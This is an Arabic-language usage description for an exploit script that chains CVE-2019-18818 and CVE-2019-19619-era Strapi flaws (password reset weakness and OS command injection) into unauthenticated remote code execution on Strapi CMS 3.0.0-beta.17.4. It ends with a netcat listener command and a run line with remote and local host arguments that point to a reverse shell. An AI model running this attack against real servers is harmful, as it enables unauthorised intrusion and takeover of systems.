
Strapi CMS 3.0.0-beta.17.4 - تنفيذ التعليمات البرمجية عن بُعد بدون مصادقة (CVE-2019-18818, CVE-2019-19609)
يستهدف هذا الاستغلال ثغرتين في إطار عمل Strapi CMS الإصدار 3.0.0-beta-17.4 مما يسمح بتنفيذ تعليمات برمجية عن بُعد دون مصادقة (RCE).
آلية استعادة كلمة المرور الضعيفة لكلمة المرور المنسية
CVSS: 9.8 - حرجة
مزيد من التفاصيل: https://nvd.nist.gov/vuln/detail/CVE-2019-18818
تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر نظام التشغيل ('حقن أوامر نظام التشغيل')
CVSS: 7.2 - عالية
مزيد من التفاصيل: https://nvd.nist.gov/vuln/detail/CVE-2019-19609
قبل تشغيل هذا الاستغلال، ابدأ مستمع netcat على المنفذ lport الذي تحدده في الخيارات أدناه.
nc -lnvp <lport>
exploit.py <rhost> <lhost> <lport>